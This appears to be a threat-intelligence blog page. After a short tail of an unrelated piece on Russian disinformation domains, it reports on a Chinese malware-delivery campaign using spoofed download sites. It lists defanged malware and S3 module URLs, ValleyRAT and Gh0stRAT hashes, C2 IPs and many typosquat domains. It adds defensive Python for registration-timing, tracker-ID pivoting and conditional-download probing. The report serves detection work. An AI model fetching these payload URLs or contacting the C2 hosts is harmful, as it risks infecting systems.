Shift Toward Encrypted & Decentralized Infrastructure

There is growing evidence that Russian-aligned actors are exploring blockchain-based domain name services (e.g., .eth, .crypto) and peer-to-peer hosting to avoid centralized control.

Strategically Registered Domains for Disinformation Campaigns

The use of strategically registered domains is a cornerstone of Russian disinformation campaigns, and despite increased scrutiny, these operations remain highly adaptable. By exploiting privacy-friendly registrars, bulletproof hosting, and emerging technologies, Russian actors continue to manipulate public discourse and influence geopolitics.

As cyber defenders, journalists, and policymakers, it is crucial to stay ahead of these evolving tactics and disrupt their ability to weaponize domain infrastructure for disinformation.

Chinese Malware Delivery Domains Part II: Data Collection

This report dives deeper into activity relating to the previously reported cluster of Chinese Malware Delivery domains. Spoofed download websites of many common applications were observed collecting user information and delivering malware to Chinese speaking users.

Details

This report examines a second cluster of over 1100 domains suspected to have been registered by the same group between April 2024 and January 2025.

Cluster 1: The previously reported Chinese Malware Delivery domains appeared dedicated to malware delivery, with minimal dynamic content or obfuscation employed. They primarily delivered Windows backdoors and info stealers, with minimal variability in HTML and JavaScript code.

Cluster 2: Suspected to be broadly focused on user data collection and selective malware delivery. The websites employ highly variable and obfuscated JavaScript files and multiple web analytics services, and purport to host binaries for Windows, macOS, iOS, and Android operating systems.

Spoofed Websites

Very similar to Cluster 1, Cluster 2 spoofs many common applications, including messenger apps, VPNs, cryptocurrency exchanges, gaming platforms, game emulators, online gambling sites, web browsers, and multimedia apps.

Below are screenshots of a sampling of the spoofed download websites over the past 60 days:

Domain Registration Details

The majority of the domains identified had common domain registration details:

  • Registrar: WebNIC Support
  • Server Type: Nginx, Cloudflare, Golfe2
  • Nameserver Domains: hndnsv1[.]com, hndnsv2[.]com
  • SSL certificate validity: 90 days

Registrant emails:

  • qingqing7896[@]outlook[.]com
  • tuyang111888[@]gmail[.]com
  • yangtu111222[@]outlook[.]com
  • ck0937064862[@]gmail[.]com
  • qq752014[@]proton[.]me
  • yangtu666888[@]outlook[.]com
  • 8tfmy1emr[@]mozmail[.]com
  • a8ddos[@]gmail[.]com
  • jtxr15[@]163[.]com
  • 6888758[@]gmail[.]com

Registrant contact phone numbers:

  • tel:+852[.]6675163
  • tel:+852[.]66751631
  • tel:+852[.]63825598
  • tel:+852[.]65820038
  • 85263825598
  • tel:+852[.]85279504241
  • tel:+852[.]285451253
  • 8526675163

Registrant names:

  • wss dss
  • wangyiyi wangyiyi
  • caihua li
  • yi yi wang
  • wang yilu

The following heatmap shows the domain registration UTC timestamps for over 1000 domains from April 2024 to January 2025. The horizontal lines mark an approximate 8 AM to 5 PM working day in China Standard Time, with US Eastern time shown for comparison; the majority of registrations fall within the China working day.

Domain registration times are not strong indicators of location, since registrations can be performed programmatically at any hour. A heatmap of registrations over time can still support inferences about a threat group's normal operating hours, volume, and fluctuations. One inference here is that the actor commonly registers domains in batches of 10 to 20. Another is that registrations continued steadily through the recent US holidays of Thanksgiving, Christmas, and New Year's, but stopped entirely from January 23 to February 8. That gap covers roughly the week before and the whole of the Chinese New Year celebrations (January 29 to February 4).
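As an added example (not the report's own tooling), the following Python computes the same views from a list of domain creation timestamps: a weekday-by-hour histogram per time zone, the share of registrations inside a local working day, bulk-registration batches, and quiet periods. The timestamps are constructed stand-ins for WHOIS creation dates, and the zone names, working-day bounds, and batch and gap thresholds are this example's own choices rather than values from the report.

```python
"""Registration-time analysis for a set of domains (added example, not the
report's own tooling).

The timestamps are constructed stand-ins for WHOIS creation dates; the zone
names, working-day bounds and batch/gap thresholds are this example's own
choices rather than values from the report.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone

try:
    from zoneinfo import ZoneInfo
except ImportError:          # Python < 3.9
    ZoneInfo = None

# Fixed-offset fallback (no DST) when no tz database is installed.
FIXED_OFFSET_HOURS = {"Asia/Shanghai": 8, "America/New_York": -5}

# Constructed sample: one bulk batch on a US holiday, a few small
# registrations, then a quiet stretch.
SAMPLE_CREATED_UTC = [
    "2024-11-28T02:13:05Z", "2024-11-28T02:13:09Z", "2024-11-28T02:13:14Z",
    "2024-11-28T02:14:01Z", "2024-11-28T02:14:40Z", "2024-11-28T02:15:22Z",
    "2024-11-28T02:16:03Z", "2024-11-28T02:16:51Z", "2024-11-28T02:17:30Z",
    "2024-11-28T02:18:12Z", "2024-11-28T02:18:59Z", "2024-11-28T02:19:44Z",
    "2024-12-25T06:40:10Z", "2024-12-25T06:41:00Z", "2024-12-25T06:41:52Z",
    "2025-01-22T08:05:00Z", "2025-01-22T08:06:10Z",
    "2025-02-10T01:30:00Z",
]


def tzinfo_for(name):
    """Resolve an IANA zone name, falling back to a fixed offset."""
    if ZoneInfo is not None:
        try:
            return ZoneInfo(name)
        except Exception:
            pass
    return timezone(timedelta(hours=FIXED_OFFSET_HOURS[name]))


def parse_utc(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hour_histogram(created_utc, tz_name):
    """Registrations per (weekday, local hour); weekday 0 is Monday.
    Rendered as a grid this is the heatmap described in the report."""
    tz = tzinfo_for(tz_name)
    counts = Counter()
    for ts in created_utc:
        local = parse_utc(ts).astimezone(tz)
        counts[(local.weekday(), local.hour)] += 1
    return counts


def business_hours_share(created_utc, tz_name, start=8, end=17):
    """Fraction of registrations inside Mon-Fri [start, end) local time."""
    tz = tzinfo_for(tz_name)
    hits = 0
    for ts in created_utc:
        local = parse_utc(ts).astimezone(tz)
        if local.weekday() < 5 and start <= local.hour < end:
            hits += 1
    return hits / len(created_utc)


def batches(created_utc, window=timedelta(minutes=30), min_size=5):
    """Chain registrations that follow the previous one within `window`;
    return (start, size) for chains of at least `min_size` (bulk signal)."""
    times = sorted(parse_utc(ts) for ts in created_utc)
    chains, current = [], [times[0]]
    for t in times[1:]:
        if t - current[-1] <= window:
            current.append(t)
        else:
            chains.append(current)
            current = [t]
    chains.append(current)
    return [(c[0], len(c)) for c in chains if len(c) >= min_size]


def gaps(created_utc, min_gap=timedelta(days=7)):
    """(last_before, first_after) for every quiet period of at least `min_gap`."""
    times = sorted(parse_utc(ts) for ts in created_utc)
    return [(a, b) for a, b in zip(times, times[1:]) if b - a >= min_gap]


if __name__ == "__main__":
    for zone in ("Asia/Shanghai", "America/New_York"):
        share = business_hours_share(SAMPLE_CREATED_UTC, zone)
        print(f"{zone}: {share:.0%} of registrations in the local working day")
    for start, size in batches(SAMPLE_CREATED_UTC):
        print(f"bulk batch of {size} starting {start.isoformat()}")
    for last, nxt in gaps(SAMPLE_CREATED_UTC):
        print(f"quiet from {last.date()} to {nxt.date()}")
```

On the constructed sample the batch detector reports one bulk run of 12 domains on a US holiday, and the working-day share is 100% in Asia/Shanghai against 0% in America/New_York, which is the contrast the heatmap is meant to show. The same caveat applies as in the text: scripted registrations can land at any hour, so treat these as supporting signals rather than attribution.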

Based on a sampling of registration costs across the 1200+ actor domains, the cheapest registrations ranged from approximately $5 to $11 USD. At those prices, the actor may have spent over $6,000 on domain registrations alone in the past 10 months.

User Data Collection

Spoofed download websites were observed importing highly obfuscated JavaScript files whose primary purpose appears to be collecting user data. The data is sent to one or more web analytics services, primarily Google Tag Manager (GTM), 51.LA, and Baidu. A possible reason for combining a Chinese analytics tracker with non-Chinese services is to improve data collection from users both inside and outside China.

Typical data observed being collected, in addition to cookies that allow longer-term tracking of users across different websites:

  • IP addresses.
  • Browser type and version.
  • Operating system.
  • Screen resolution.
  • Referring website.
  • Pages visited and time spent on each page.
  • Geographic location (based on IP address).

Some websites were observed loading a js-sdk-recorder.min.js file and may attempt to record the user's browser session.

The scripts also fingerprint the browser and perform checks for specific browser types and operating systems.

The following are trackers extracted from the spoofed download sites and are suspected to be associated with the actor.


Google Tag Manager (GTM-)

  • GTM-5P954SP
  • GTM-MG73JRC
  • GTM-T9RSM2B
  • GTM-5XB9N2J
  • GTM-WX6RDCT
  • GTM-KPB2L23
  • GTM-PBZC932

Google Analytics (G-)

  • G-2517DCZEWG
  • G-5LJSE1G1G3
  • G-37ZJLQFQXW
  • G-BFW850DB5X

Google Analytics (UA-)

  • UA-18527314

Facebook Pixel

  • 3440778589358687
  • 2798670340360754
  • 2074369089413155

Baidu Analytics (hm.js)

  • 9219f302f4d003586fce1a5e683324f9
  • 749a9b99a1c14a45712efed8c3b8fedd
  • cfce2b91900d6b26eacc4548cf269142
  • d4d1ee73c893371d6f711041bf64786f
  • 3e8f2b2bdf2da00ce0564d6c6ef21b48
  • 15a9e7243ee6e6441ab262ba4db61e8b
  • 39f7c9431fdd7a3d6e06a177938de82a
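The following Python, an added example rather than the report's tooling, pulls the same classes of tracker ID out of raw page source and reports which IDs recur across domains, which is how analytics accounts become pivot points. Both HTML samples are constructed for the example (the GTM, GA, Pixel, and Baidu values reuse IDs from the list above); the regexes follow each service's public embed snippet, and the two 51.LA forms in particular are this example's assumption about that vendor's snippet formats.

```python
"""Extract web-analytics tracker IDs from page source (added example, not the
report's own tooling).

An actor who reuses one analytics account across many spoofed sites leaves a
pivot point in every page; pulling the IDs out of raw HTML/JS and diffing
them across domains surfaces that overlap. The regexes follow the public
embed snippets of each service; the two 51.LA forms are this example's
assumption about that vendor's snippet formats. Both HTML samples are
constructed for the example, not captured from actor sites.
"""
import re

TRACKER_PATTERNS = {
    "gtm": re.compile(r"\bGTM-[A-Z0-9]{5,8}\b"),
    "ga4": re.compile(r"\bG-[A-Z0-9]{6,12}\b"),
    "ua": re.compile(r"\bUA-\d{4,10}(?:-\d+)?\b"),
    "facebook": re.compile(r"""\bfbq\(\s*['"]init['"]\s*,\s*['"](\d{15,16})['"]"""),
    "baidu": re.compile(r"hm\.baidu\.com/hm\.js\?([0-9a-f]{32})"),
    "51la": re.compile(
        r"""js\.users\.51\.la/(\d{5,10})\.js|LA\.init\(\s*\{\s*id\s*:\s*['"]([A-Za-z0-9]+)['"]"""
    ),
}

SAMPLE_HTML_A = r"""<!-- constructed sample page, not an actor site -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];})(window,document,'script','dataLayer','GTM-5P954SP');</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-2517DCZEWG"></script>
<script>gtag('config', 'UA-18527314-1');</script>
<script>fbq('init', '3440778589358687');</script>
<script>var _hmt=_hmt||[];(function(){var hm=document.createElement("script");
hm.src="https://hm.baidu.com/hm.js?9219f302f4d003586fce1a5e683324f9";})();</script>
<script>LA.init({id:"JF3XExample",ck:"JF3XExample"})</script>
<script src="//js.users.51.la/21234567.js"></script>
"""

SAMPLE_HTML_B = r"""<!-- constructed second page that shares the GTM container -->
<script>(function(w,d,s,l,i){})(window,document,'script','dataLayer','GTM-5P954SP');</script>
<script>fbq('init', '2798670340360754');</script>
"""


def extract_trackers(html):
    """Return {tracker_type: sorted list of IDs} found in the page source."""
    found = {}
    for kind, pattern in TRACKER_PATTERNS.items():
        ids = set()
        for m in pattern.finditer(html):
            # Use the first capturing group that matched, else the whole match.
            value = next((g for g in m.groups() if g), None) or m.group(0)
            if kind == "ua":                       # UA-1234567-2 -> UA-1234567
                value = "-".join(value.split("-")[:2])
            ids.add(value)
        if ids:
            found[kind] = sorted(ids)
    return found


def shared_trackers(pages):
    """pages: {domain: html}. Return {(kind, id): [domains]} for every ID
    that appears on two or more domains, i.e. the pivot candidates."""
    seen = {}
    for domain, html in pages.items():
        for kind, ids in extract_trackers(html).items():
            for tracker_id in ids:
                seen.setdefault((kind, tracker_id), set()).add(domain)
    return {key: sorted(domains) for key, domains in seen.items() if len(domains) > 1}


if __name__ == "__main__":
    for kind, ids in extract_trackers(SAMPLE_HTML_A).items():
        print(f"{kind:9} {', '.join(ids)}")
    pages = {"site-a.example": SAMPLE_HTML_A, "site-b.example": SAMPLE_HTML_B}
    for (kind, tracker_id), domains in shared_trackers(pages).items():
        print(f"shared {kind} {tracker_id}: {', '.join(domains)}")
```

Run it over the saved page source of each suspect domain (the obfuscated loader scripts as well as the HTML, since the IDs often sit inside a dynamically loaded file) and feed the shared IDs back into passive-DNS or search-engine pivots. A shared GTM container is a strong link because it is tied to one Google account; a shared Baidu or Facebook ID is weaker if the value could have been copied from a legitimate site's template.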


SEO Poisoning and Traffic Generation

Creating thousands of websites and applying SEO tactics may be intended to push the sites above legitimate sources in search results. The resulting traffic can then be steered to other malicious sites.

Fake Login Dashboards to Deliver Malware

The actor employs several websites themed as merchant backend management dashboards, payment services, crypto exchanges, email, and office applications. It is suspected that links to the fake login sites are distributed via phishing and similar means, with the credentials supplied to the recipients. The mix of English and Chinese on the fake login websites and the common theme of merchant and payment backend management applications suggest the actor may be targeting English-speaking individuals doing business in China.

Website Title: “Login | Upcube - Admin & Dashboard Template”

UPCUBE 商户后台管理 (“Merchant backend management”)

The sites were observed hard-coding the credential validation checks in the HTML login forms, as in the following example from the malicious domain "otpaycn[.]com":

Upon logging into the fake merchant backend dashboard, the following index page is loaded.

The only functional element is the Home Page link at the top of the left panel. Clicking it loads an image in the center of the page styled as a warning banner with a "Confirm" button. Clicking anywhere on the image downloads a malicious dropper that, when executed, runs ValleyRAT on the system and fetches several modules from an Amazon S3 bucket for additional functionality.

The image roughly translates to the following:

“VPN Usage Reminder Network connection failed, please use the dedicated network VPN It has been detected that your browser is missing the necessary VPN plug-in. Some functions cannot be used normally. Please update this function version first; if you choose to stop updating, you will not be able to use this function normally. What are the risks and how should I choose Confirm.”


Delivery domain:

  • otpaycn[.]com

Malware download URL:

  • https[:]//down[.]aydareklam[.]com/anacard.zip

Initial download (SHA256):

  • anacard.zip: 7aa74fc5d5f1c356229fa83cd4330f8bfd1b640e09b897602382557fbeefd5ea
  • Unzips to anacard.exe: 5f39c5fc10130916e3b67e617979eb22febccc274a88af7a43e21cc5311d3f20

ValleyRAT dropped by anacard.exe (SHA256):

  • 5cd549ca7b5a046afa1f9ddb679dbf04e8879307d2dd813c7d44d00525ab8638

Modules downloaded from the Amazon S3 bucket:

  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/MSVCP140[.]dll
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/xzc[.]exe
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/vcruntime140_1[.]dll
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/data[.]ini
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/view[.]res
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/VCRUNTIME140[.]dll
  • https[:]//omnisentience[.]s3[.]ap-east-1[.]amazonaws[.]com/libcef[.]dll

Downloaded module hashes (SHA256):

  • data.ini: 9b5957e7d9bf0863fc7247df9ea02deac6f1b1a22fc7b9d4dfd89f41f27a400e
  • libcef.dll: 0003417d1ba6370aab194d2bab97e709bbf1d8efbf60d02a1c96117a2e7a7e3d
  • MSVCP140.dll: 99e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd
  • vcruntime140_1.dll: 6d3a6cde6fc4d3c79aabf785c04d2736a3e2fd9b0366c9b741f054a13ecd939e
  • VCRUNTIME140.dll: a06c9ea4f815dac75d2c99684d433fbfc782010fae887837a03f085a29a217e8
  • view.res: f63894af1b84fca6d2cb2732e0cf31d1523d6949edd4738c63663957d46dadae
  • xzc.exe: 7d14ba4da535892e469ca66c1f749bab553c2f9af04eb978d5200431a2f01435


Malware

Notably, both clusters 1 and 2 were observed delivering identical Gh0stRAT and ValleyRAT binaries. Cluster 2 operates multiple varieties of spoofed website code, which often use highly obfuscated JavaScript to collect user information and, potentially, to render functional malware delivery links only selectively. The majority of the websites were observed delivering 0-byte files and, less commonly, copies of legitimate install files hosted locally on the site. A subset of the spoofed download sites hosted the same Gh0stRAT and ValleyRAT binaries as cluster 1, including "googleochrome[.]com", discussed in more depth later.

The 0-byte files are suspected to be placeholders, with real malware being delivered through obfuscated JavaScript dynamically loaded when certain user conditions are identified such as Geo IP location, language settings and browser type.
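An added example of the check a practitioner would run on such a download link (not the report's own tooling): fetch it under several client profiles and compare what comes back. The URL, client profiles, and the server behaviour emulated by `fake_fetch` are constructed for the example; `urllib_fetch` is the live equivalent for field use. Varying request headers only exercises language and user-agent gating; IP-geolocation checks need vantage points in the target region.

```python
"""Differential probing of a download link (added example, not the report's
own tooling).

The same URL is fetched under several client profiles and the bodies are
hashed and compared; a 0-byte body for one profile next to a real archive
for another is the conditional-delivery pattern described in the report.
`fetch` is injectable: `fake_fetch` is a constructed stand-in for the
actor's server so the example runs offline, `urllib_fetch` is for field
use. Header variation cannot emulate IP-geolocation gating.
"""
import hashlib
import urllib.request

CHROME_WIN = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36")
SAFARI_MAC = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
              "(KHTML, like Gecko) Version/17.0 Safari/605.1.15")

# Client profiles to probe with; extend with Android/iOS as needed.
PROFILES = {
    "win-chrome-zh": {"User-Agent": CHROME_WIN, "Accept-Language": "zh-CN,zh;q=0.9"},
    "win-chrome-en": {"User-Agent": CHROME_WIN, "Accept-Language": "en-US,en;q=0.9"},
    "mac-safari-zh": {"User-Agent": SAFARI_MAC, "Accept-Language": "zh-CN,zh;q=0.9"},
}

ZIP_MAGIC = b"PK\x03\x04"


def probe(url, fetch, profiles=PROFILES):
    """Fetch `url` once per profile; record size, SHA-256 and leading bytes."""
    results = {}
    for name, headers in profiles.items():
        body = fetch(url, headers)
        results[name] = {
            "size": len(body),
            "sha256": hashlib.sha256(body).hexdigest(),
            "magic": body[:4],
        }
    return results


def classify(results):
    """Summarise whether the server treats all profiles alike."""
    digests = {r["sha256"] for r in results.values()}
    if len(digests) == 1:
        return "uniform"
    if any(r["size"] == 0 for r in results.values()):
        return "placeholder-for-some-profiles"
    return "varies-by-profile"


def profiles_served_archive(results):
    """Names of the profiles that received a real zip rather than a stub."""
    return sorted(n for n, r in results.items() if r["magic"] == ZIP_MAGIC)


def fake_fetch(url, headers):
    """Constructed stand-in for the actor's server: a zip for Chinese-language
    Windows Chrome, an empty body for everyone else."""
    zh = headers.get("Accept-Language", "").startswith("zh")
    windows = "Windows" in headers.get("User-Agent", "")
    return ZIP_MAGIC + b"constructed-archive-body" if zh and windows else b""


def urllib_fetch(url, headers, timeout=20):
    """Live fetch for field use; run it from an isolated vantage point."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    # Hypothetical URL; swap in a real download link and urllib_fetch for field use.
    res = probe("https://download.example.invalid/app.zip", fake_fetch)
    for name, r in res.items():
        print(f"{name:14} {r['size']:6d} bytes  sha256={r['sha256'][:16]}...")
    print("verdict:", classify(res), "| archive served to:", profiles_served_archive(res))
```

When probing live infrastructure, fetch from a vantage point that is not attributable to your organisation, save every body for hashing and sandbox detonation, and never open the archives on the probing host. A "uniform" verdict across header profiles does not rule out cloaking; the site may be keying on the client IP or on JavaScript-side checks that a plain HTTP fetch never executes.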

Earlier versions of the spoofed download sites typically hosted the malware locally on the same server as the spoofed website. Later spoofed download sites began hosting files on other servers, commonly other actor-owned domains, often on subdomains such as "cnd." or "down."

More recent spoofed download sites continue to separate the spoofed websites from the hosted files by using Amazon’s CloudFront content delivery network such as the following: 

  • Spoofed download sites for Lets VPN: “letscavpn[.]com” & “letsekvpn[.]com”
  • Download URL: “https[:]//d2g2a3g6fn6aza.cloudfront[.]net/android/letsvpn-latest[.]apk”

Using CDNs such as CloudFront as a delivery network can obscure the true origin location of the malware and make detection and mitigation efforts more difficult. 

C2 Infrastructure

Multiple suspected Gh0stRAT backdoor samples hosted on the spoofed download websites were identified as beaconing to command-and-control (C2) IP addresses. Several of those IP addresses shared the same server scan hash, which allows a potential pivot to other IP addresses configured by the actor.

Malware delivery domain “googleochrome[.]com” spoofs as a Chrome browser download site and contains code to load content from a similarly named but different domain: “https[:]//down.googluchrome[.]com”

This initiates a file download for a file named “/Chrome.zip” with a SHA256 hash of “09efbe0c3e69c0f9a578bbbf0d475bd418497717921713779d1aa89dd2be35d6” 

Chrome.zip unzips a file named “Chrome.msi” with a SHA256 hash of “e39e44cb79c5b1918d8139cfbb6d2ada044dbe4b413e86504f10e902072743fd”

Chrome.msi contains a file named “payload”, 522863520bcc368631a2db5016a1af68f60ecb074ddf19c9e7bff9834bb05248

The payload file upon execution calls out to the following IP:

  • TCP 154.91.90[.]102:4433
  • TCP 154.91.90[.]102:10443

At the time of observation, the IP hosted a WinRM service with a Shodan.io hash of "%3A897366806". 145 IPs shared this hash, nearly all under the Tcloudnet, Inc. organization.

Triaging those IPs identified several with a recent history of malicious files from similar variants communicating with them.

154[.]82[.]85[.]79
206[.]238[.]115[.]153
154[.]82[.]85[.]14
156[.]251[.]24[.]167
156[.]248[.]77[.]177
206[.]238[.]115[.]38
154[.]82[.]92[.]231
156[.]251[.]18[.]26
206[.]238[.]221[.]10
206[.]238[.]115[.]132
156[.]251[.]25[.]187
206[.]238[.]123[.]166
154[.]91[.]64[.]50
206[.]238[.]198[.]133
154[.]91[.]64[.]75
206[.]238[.]42[.]223
206[.]238[.]70[.]202
206[.]238[.]115[.]203
154[.]82[.]67[.]135

Conclusion

A crucial aspect of this investigation lies in recognizing the broader implications of the observed tactics. History has repeatedly demonstrated that techniques initially deployed against one demographic or vertical are often adapted and repurposed to target others. While this campaign appears to currently focus on Chinese-speaking users, the sophisticated methods employed—including obfuscated JavaScript, strategic use of analytics services, and evolving infrastructure for malware delivery and data collection—represent a readily transferable playbook. Therefore, diligent monitoring and analysis of these tactics are not merely relevant to the current situation.

By proactively studying and understanding these techniques now, the cybersecurity community can better prepare for similar threats that may emerge, targeting different demographics and potentially posing a direct risk to a wider range of users in the future. This proactive approach is essential for developing effective defenses and mitigating the impact of future, related campaigns.

IOCs

Domains
letstxvpn[.]com
letsthvpn[.]com
letstvvpn[.]com
letstevpn[.]com
letstavpn[.]com
letstzvpn[.]com
letstnvpn[.]com
letstdvpn[.]com
letstuvpn[.]com
letstkvpn[.]com
otpaycn[.]com
okpaykol[.]com
todeskzsada[.]top
letscavpn[.]com
letsczvpn[.]com
letscnvpn[.]com
letscuvpn[.]com
letscxvpn[.]com
letscsvpn[.]com
letsckvpn[.]com
letschvpn[.]com
letscevpn[.]com
letscovpn[.]com
lestscvpn[.]com
lestsevpn[.]com
lestskvpn[.]com
lestsvvpn[.]com
lestsovpn[.]com
lestsxvpn[.]com
lestsuvpn[.]com
lestszvpn[.]com
lestsnvpn[.]com
lestsavpn[.]com
googleechrome[.]com
quickqzx[.]com
quickqzs[.]com
quickqzc[.]com
quickqzn[.]com
quickqza[.]com
quickqzk[.]com
quickqzv[.]com
quickqzo[.]com
quickqzu[.]com
quickqze[.]com
googlerchrome[.]com
googlecchrome[.]com
googleschrome[.]com
googlevchrome[.]com
googlezchrome[.]com
googlenchrome[.]com
googleachrome[.]com
googletchrome[.]com
googlexchrome[.]com
googleofanyi[.]com
googleochrome[.]com
letsrsvpn[.]com
letsravpn[.]com
letsrevpn[.]com
letsrnvpn[.]com
letsrzvpn[.]com
letsrxvpn[.]com
letsrvvpn[.]com
letsrkvpn[.]com
letsruvpn[.]com
letsrovpn[.]com
letselvpn[.]com
letsebvpn[.]com
letsevvpn[.]com
letsepvpn[.]com
letsenvpn[.]com
letsehvpn[.]com
letseovpn[.]com
letseuvpn[.]com
letsetvpn[.]com
letsekvpn[.]com
letskkvpn[.]com
quickqcs[.]com
quickqcx[.]com
quickqcz[.]com
letskrvpn[.]com
letskwvpn[.]com
letsksvpn[.]com
letskxvpn[.]com
letskpvpn[.]com
letskzvpn[.]com
letskivpn[.]com
letskuvpn[.]com
letsknvpn[.]com
letskvvpn[.]com
letskovpn[.]com
clashxh[.]com
clasheh[.]com
clashvh[.]com
letezvpn[.]com
letevvpn[.]com
letexvpn[.]com
googlofanyi[.]com
letescvpn[.]com
clashuh[.]com
letecvpn[.]com
clashch[.]com
googluchrome[.]com
googlochrome[.]com
winrarzip[.]com
ldplayerv[.]com
todesksc[.]com
wpsofficerx[.]com
wpsofficera[.]com
wpsofficers[.]com
wpsofficere[.]com
wpsofficerc[.]com
wpsofficeru[.]com
wpsofficerz[.]com
wpsofficerv[.]com
wpsofficero[.]com
wpsofficern[.]com
letsecvpn[.]com
letsexvpn[.]com
letsesvpn[.]com
letseavpn[.]com
letsezvpn[.]com
letsaevpn[.]com
letsacvpn[.]com
letsazvpn[.]com
letsavvpn[.]com
letsaxvpn[.]com
xhjianvpns[.]com
xhjianvpnx[.]com
xhjianvpnz[.]com
kuaimiaospn[.]com
kuaimiaoapn[.]com
kuaimiaoxpn[.]com
kuaimiaocpn[.]com
kuaimiaozpn[.]com
xhjianzpn[.]com
clashxa[.]com
xhjiancpn[.]com
clashxc[.]com
kuaichengz[.]com
kuaichengx[.]com
clashsx[.]com
linecu[.]com
linecf[.]com
clashsc[.]com
linecz[.]com
clashsz[.]com
wpsoffica[.]com
wpsofficc[.]com
wpsofficx[.]com
wpsoffico[.]com
wpsofficu[.]com
wpsofficv[.]com
wpsofficn[.]com
wpsofficb[.]com
wpsofficz[.]com
wpsofficw[.]com
ldplayers[.]com
winrarr[.]com
todesksn[.]com
xhjianvqn[.]com
xhjianvpnc[.]com
todeskzx[.]xyz
xhjianzvpn[.]com
xhjiansvpn[.]com
kuaichencx[.]com
kuaichencz[.]com
kuaichencs[.]com
xhjiannvpn[.]com
xhjianvnpn[.]com
xhjianavpn[.]com
xhjianevpn[.]com
xhjianxvpn[.]com
lestxvpn[.]com
lestvnpn[.]com
lestvwpn[.]com
lestnvpn[.]com
lesntvpn[.]com
lesetvpn[.]com
lestovpn[.]com
lesatvpn[.]com
lesstvpn[.]com
lestkvpn[.]com
xhjevpn[.]com
xhjvepn[.]com
wpsaoffice[.]com
wpsxoffice[.]com
wpscoffice[.]com
wpsooffice[.]com
wpsboffice[.]com
wpswoffice[.]com
wpsvoffice[.]com
wpsuoffice[.]com
wpsnoffice[.]com
wpszoffice[.]com
fallsearth[.]com
klimesh[.]com
rolandca[.]com
o-keil[.]com
yellowfiles[.]com
qmzdd[.]com
clashcx[.]com
clashcu[.]com
clashcv[.]com
cn-kuaifan[.]co
telegramxk[.]com
telegramxv[.]com
telegramxc[.]com
telegramxn[.]com
yiiwaiwai[.]com
telegram-zh[.]cn
xhjianvvpn[.]com
clashru[.]com
quicqkvv[.]com
quicqkvc[.]com
quicqkvn[.]com
quicqkva[.]com
quicqkve[.]com
meiqialx[.]com
meiqialz[.]com
meiqialc[.]com
meiqiale[.]com
meiqiala[.]com
nxhszx[.]com
clashxv[.]com
clashxz[.]com
clashxn[.]com
helloworldra[.]com
letssvbn[.]com
meiqiarrc[.]com
helloworldrc[.]com
letssvrn[.]com
meiqiarrv[.]com
clashvn[.]com
letssvqn[.]com
clashvx[.]com
meiqiarra[.]com
helloworldre[.]com
meiqiarrx[.]com
meiqiarre[.]com
tpidesign[.]com
meiqiacs[.]com
meiqiacx[.]com
meiqiacv[.]com
meiqiaci[.]com
meiqiacc[.]com
meiqiaco[.]com
meiqiaca[.]com
meiqiacr[.]com
meiqiace[.]com
meiqiacu[.]com
sougousruf[.]com
sougousrfo[.]com
sougoushrf[.]com
sougousrfa[.]com
sougousrfx[.]com
sougousrfn[.]com
sougousrfe[.]com
sougousrfu[.]com
sougousrfz[.]com
sougousrfc[.]com
360browseeu[.]com
360browseeo[.]com
360browseen[.]com
360browseeb[.]com
360browseev[.]com
360browseea[.]com
360browseet[.]com
360browseer[.]com
360browseex[.]com
360browseei[.]com
linebx[.]com
linebh[.]com
linebbv[.]com
linebbh[.]com
linebn[.]com
linebbc[.]com
linebu[.]com
linebbe[.]com
linebbr[.]com
linebbx[.]com
potatolen[.]com
potatoler[.]com
potatolea[.]com
potatolex[.]com
potatolec[.]com
potatoleu[.]com
potatoleo[.]com
potatoleb[.]com
potatolek[.]com
potatolez[.]com
letsppnu[.]com
letsppnw[.]com
letsppna[.]com
letsppnh[.]com
letsppni[.]com
letsppnc[.]com
letsppnb[.]com
letsppne[.]com
letsppnr[.]com
letsppnk[.]com
kuaifanrg[.]com
kuaifanga[.]com
kuaifange[.]com
kuaifangn[.]com
kuaifanne[.]com
clashh88[.]com
clashvvh[.]com
clashhvv[.]com
xhjianapn[.]com
xhjianppn[.]com
xhjianvvv[.]com
xhjianvvn[.]com
xhjiangvpn[.]com
potatua[.]com
potatun[.]com
potatue[.]com
potatuc[.]com
potatuo[.]com
clashcnm[.]com
clashcdn[.]com
clashchn[.]com
clashcnn[.]com
clashccn[.]com
clashrrn[.]com
clashrrv[.]com
clashrrs[.]com
clashhes[.]com
clashheu[.]com
clashhea[.]com
clashhew[.]com
clashhee[.]com
clashha[.]com
clashhr[.]com
clashhu[.]com
clashhe[.]com
clashho[.]com
letsvpnmna[.]com
letsvpnmnc[.]com
letsvpnmnb[.]com
letsvpnmnd[.]com
letsvpnmng[.]com
letsvpnmne[.]com
letsvpnmnf[.]com
letsvpnmnh[.]com
letsvpnmno[.]com
letsvpnmnk[.]com
letskbvpn[.]com
letskcvpn[.]com
letskavpn[.]com
letskhvpn[.]com
letskfvpn[.]com
letskkpn[.]com
letskgvpn[.]com
letskdvpn[.]com
letskevpn[.]com
letsktvpn[.]com
imtekkon[.]com
artklick[.]com
gpm-sprinklers[.]com
ratuiklan[.]com
frkls[.]com
davidtickle[.]com
forkling[.]com
backlinkskopen[.]com
kleinoaktrack[.]com
klinik-hp[.]com
lestvvmn[.]com
lestvvmnm[.]com
lestvvnm[.]com
lestvvnnm[.]com
lestvvnmm[.]com
letsvvvvpn[.]com
letswvvvpn[.]com
kuaicheum[.]com
kuaicheim[.]com
kuaichecm[.]com
